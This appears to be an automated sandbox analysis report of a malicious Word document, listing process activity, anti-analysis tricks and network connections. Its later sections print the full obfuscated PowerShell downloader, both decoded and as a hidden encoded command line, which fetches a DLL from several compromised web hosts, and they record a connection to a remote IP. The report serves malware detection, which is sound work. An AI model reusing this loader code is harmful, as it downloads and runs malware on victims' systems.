Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2420 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: powershell.exe, 00000005.00000002.2326313954.0000000000182000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_00433278 mov eax, dword ptr fs:[00000030h] 7_2_00433278
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 7_2_001727EC mov eax, dword ptr fs:[00000030h] 7_2_001727EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_00403278 mov eax, dword ptr fs:[00000030h] 8_2_00403278
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 8_2_001F27EC mov eax, dword ptr fs:[00000030h] 8_2_001F27EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00283278 mov eax, dword ptr fs:[00000030h] 9_2_00283278
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_003427EC mov eax, dword ptr fs:[00000030h] 9_2_003427EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_002B3278 mov eax, dword ptr fs:[00000030h] 10_2_002B3278
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_001E27EC mov eax, dword ptr fs:[00000030h] 10_2_001E27EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00403278 mov eax, dword ptr fs:[00000030h] 11_2_00403278
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_001C27EC mov eax, dword ptr fs:[00000030h] 11_2_001C27EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001E3278 mov eax, dword ptr fs:[00000030h] 12_2_001E3278
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001627EC mov eax, dword ptr fs:[00000030h] 12_2_001627EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_001F27EC mov eax, dword ptr fs:[00000030h] 13_2_001F27EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_001B3278 mov eax, dword ptr fs:[00000030h] 14_2_001B3278
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002B27EC mov eax, dword ptr fs:[00000030h] 14_2_002B27EC
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory protected: page write copy | page execute | page execute read | page execute and read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 190.55.186.229 80
Encrypted powershell cmdline option found
Source: unknown Process created: Base64 decoded SeT-ITEM ('v'+'ARia'+'BlE:f'+'7D'+'H') ( [TYPe]("{2}{0}{4}{1}{3}"-F 'SteM.iO','cto','sy','ry','.dire')) ; sEt-ItEM VaRiABLe:Sg2xU ( [TyPe]("{7}{4}{5}{1}{8}{2}{0}{6}{3}"-F'AnAg','CEPoIn','M','R','TEm.Net.SEr','vI','E','SYs','t') ); $Zz82_42=$B03I + [char](33) + $K78S;$O00G=('E_'+'6Z'); $F7DH::"crEA`TEDI`R`ecTORy"($HOME + ((('egTL'+'xb'+'f')+'yv'+'k'+'eg'+'T'+'Gc'+('qt'+'r_f')+('eg'+'T'))."rePL`ACE"(([CHAR]101+[CHAR]103+[CHAR]84),[string][CHAR]92)));$P46U=('A'+('65'+'Q')); $SG2XU::"s`ECu`RiTYprOTo`c`Ol" = ('Tl'+('s1'+'2'));$I_7R=('D'+('75'+'G'));$Yzjqxxq = ('C4'+'6T');$L__S=(('P_'+'_')+'D');$Uk1tt1_=$HOME+(('H'+('Ox'+'Lxbf')+'y'+'v'+('kHOx'+'Gcq')+'t'+('r_f'+'HOx'))."rEpl`Ace"(('HO'+'x'),[stRINg][CHaR]92))+$Yzjqxxq+'.d' + 'll';$T55L=(('Y'+'21')+'Q');$Jg41scw='h' + 'tt' + 'p';$Niooi2q=(('n'+'s wu ')+('d'+'b ')+('nd'+':')+('//'+'ni')+'gh'+('t'+'lifemu'+'mb')+'a'+('i.'+'cl')+('ub/x'+'/0w'+'B')+('D3'+'/!n'+'s w')+'u '+'d'+'b'+(' nd'+'s')+':/'+('/'+'sho')+('p.no'+'w')+'f'+('al.d'+'e')+'v'+'/w'+('p-in'+'c')+('lu'+'de')+('s/R'+'lMO'+'bf')+('2j0'+'/!ns w'+'u')+(' '+'db '+'nd:/')+'/'+('e-'+'w'+'design')+'.'+('e'+'u/wp')+'-'+'c'+('o'+'nte')+('nt'+'/'+'bn1Ig'+'D'+'ejh/!ns ')+('wu'+' d'+'b nd')+':/'+'/'+'t'+('ra'+'umf')+'r'+'a'+('ue'+'n')+('-uk'+'r')+('ai'+'ne'+'.de')+'/b'+('in'+'/Jye')+('S/!'+'ns wu ')+('d'+'b ')+('n'+'ds:')+('//'+'jflm')+('kt'+'g.wpc')+'om'+('sta'+'gi'+'ng.'+'c'+'om/wp'+'-content')+('/AK'+'/')+('!ns'+' wu ')+('db '+'nd')+('s:'+'//lin')+'hk'+('i'+'en')+'m
Source: C:\Windows\System32\cmd.exe Process created: Base64 decoded SeT-ITEM ('v'+'ARia'+'BlE:f'+'7D'+'H') ( [TYPe]("{2}{0}{4}{1}{3}"-F 'SteM.iO','cto','sy','ry','.dire')) ; sEt-ItEM VaRiABLe:Sg2xU ( [TyPe]("{7}{4}{5}{1}{8}{2}{0}{6}{3}"-F'AnAg','CEPoIn','M','R','TEm.Net.SEr','vI','E','SYs','t') ); $Zz82_42=$B03I + [char](33) + $K78S;$O00G=('E_'+'6Z'); $F7DH::"crEA`TEDI`R`ecTORy"($HOME + ((('egTL'+'xb'+'f')+'yv'+'k'+'eg'+'T'+'Gc'+('qt'+'r_f')+('eg'+'T'))."rePL`ACE"(([CHAR]101+[CHAR]103+[CHAR]84),[string][CHAR]92)));$P46U=('A'+('65'+'Q')); $SG2XU::"s`ECu`RiTYprOTo`c`Ol" = ('Tl'+('s1'+'2'));$I_7R=('D'+('75'+'G'));$Yzjqxxq = ('C4'+'6T');$L__S=(('P_'+'_')+'D');$Uk1tt1_=$HOME+(('H'+('Ox'+'Lxbf')+'y'+'v'+('kHOx'+'Gcq')+'t'+('r_f'+'HOx'))."rEpl`Ace"(('HO'+'x'),[stRINg][CHaR]92))+$Yzjqxxq+'.d' + 'll';$T55L=(('Y'+'21')+'Q');$Jg41scw='h' + 'tt' + 'p';$Niooi2q=(('n'+'s wu ')+('d'+'b ')+('nd'+':')+('//'+'ni')+'gh'+('t'+'lifemu'+'mb')+'a'+('i.'+'cl')+('ub/x'+'/0w'+'B')+('D3'+'/!n'+'s w')+'u '+'d'+'b'+(' nd'+'s')+':/'+('/'+'sho')+('p.no'+'w')+'f'+('al.d'+'e')+'v'+'/w'+('p-in'+'c')+('lu'+'de')+('s/R'+'lMO'+'bf')+('2j0'+'/!ns w'+'u')+(' '+'db '+'nd:/')+'/'+('e-'+'w'+'design')+'.'+('e'+'u/wp')+'-'+'c'+('o'+'nte')+('nt'+'/'+'bn1Ig'+'D'+'ejh/!ns ')+('wu'+' d'+'b nd')+':/'+'/'+'t'+('ra'+'umf')+'r'+'a'+('ue'+'n')+('-uk'+'r')+('ai'+'ne'+'.de')+'/b'+('in'+'/Jye')+('S/!'+'ns wu ')+('d'+'b ')+('n'+'ds:')+('//'+'jflm')+('kt'+'g.wpc')+'om'+('sta'+'gi'+'ng.'+'c'+'om/wp'+'-content')+('/AK'+'/')+('!ns'+' wu ')+('db '+'nd')+('s:'+'//lin')+'hk'+('i'+'en')+'m Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file. Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAZQBUAC0ASQBUAEUATQAgACAAKAAnAHYAJwArACcAQQBSAGkAYQAnACsAJwBCAGwARQA6AGYAJwArACcANwBEACcAKwAnAEgAJwApACAAIAAoACAAWwBUAFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsANAB9AHsAMQB9AHsAMwB9ACIALQBGACAAJwBTAHQAZQBNAC4AaQBPACcALAAnAGMAdABvACcALAAnAHMAeQAnACwAJwByAHkAJwAsACcALgBkAGkAcgBlACcAKQApACAAIAA7ACAAcwBFAHQALQBJAHQARQBNACAAVgBhAFIAaQBBAEIATABlADoAUwBnADIAeABVACAAKAAgACAAWwBUAHkAUABlAF0AKAAiAHsANwB9AHsANAB9AHsANQB9AHsAMQB9AHsAOAB9AHsAMgB9AHsAMAB9AHsANgB9AHsAMwB9ACIALQBGACcAQQBuAEEAZwAnACwAJwBDAEUAUABvAEkAbgAnACwAJwBNACcALAAnAFIAJwAsACcAVABFAG0ALgBOAGUAdAAuAFMARQByACcALAAnAHYASQAnACwAJwBFACcALAAnAFMAWQBzACcALAAnAHQAJwApACAAIAApADsAIAAgACQAWgB6ADgAMgBfADQAMgA9ACQAQgAwADMASQAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQASwA3ADgAUwA7ACQATwAwADAARwA9ACgAJwBFAF8AJwArACcANgBaACcAKQA7ACAAIAAkAEYANwBEAEgAOgA6ACIAYwByAEUAQQBgAFQARQBEAEkAYABSAGAAZQBjAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAZwBUAEwAJwArACcAeABiACcAKwAnAGYAJwApACsAJwB5AHYAJwArACcAawAnACsAJwBlAGcAJwArACcAVAAnACsAJwBHAGMAJwArACgAJwBxAHQAJwArACcAcgBfAGYAJwApACsAKAAnAGUAZwAnACsAJwBUACcAKQApAC4AIgByAGUAUABMAGAAQQBDAEUAIgAoACgAWwBDAEgAQQBSAF0AMQAwADEAKwBbAEMASABBAFIAXQAxADAAMwArAFsAQwBIAEEAUgBdADgANAApACwAWwBzAHQAcgBpAG4AZwBdAFsAQwBIAEEAUgBdADkAMgApACkAKQA7ACQAUAA0ADYAVQA9ACgAJwBBACcAKwAoACcANgA1ACcAKwAnAFEAJwApACkAOwAgACAAJABTAEcAMgBYAFUAOgA6ACIAcwBgAEUAQwB1AGAAUgBpAFQAWQBwAHIATwBUAG8AYABjAGAATwBsACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABJAF8ANwBSAD0AKAAnAEQAJwArACgAJwA3ADUAJwArACcARwAnACkAKQA7ACQAWQB6AGoAcQB4AHgAcQAgAD0AIAAoACcAQwA0ACcAKwAnADYAVAAnACkAOwAkAEwAXwBfAFMAPQAoACgAJwBQAF8AJwArACcAXwAnACkAKwAnAEQAJwApADsAJABVAGsAMQB0AHQAMQBfAD0AJABIAE8ATQBFACsAKAAoACcASAAnACsAKAAnAE8AeAAnACsAJwBMAHgAYgBmACcAKQArACcAeQAnACsAJwB2ACcAKwAoACcAawBIAE8AeAAnACsAJwBHAGMAcQAnACkAKwAnAHQAJwArACgAJwByAF8AZgAnACsAJwBIAE8AeAAnACkAKQAuACIAcgBFAHAAbABgAEEAYwBlACIAKAAoACcASABPACcAKwAnAHgAJwApACwAWwBzAHQAUgBJAE4AZwBdAFsAQwBIAGEAUgBdADkAMgApACkAKwAkAFkAegBqAHEAeAB4AHEAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFQANQA1AEwAPQAoACgAJwBZACcAKwAnADIAMQAnACkAKwAnAFEAJwApADsAJABKAGcANAAxAHMAYwB3AD0AJwBoA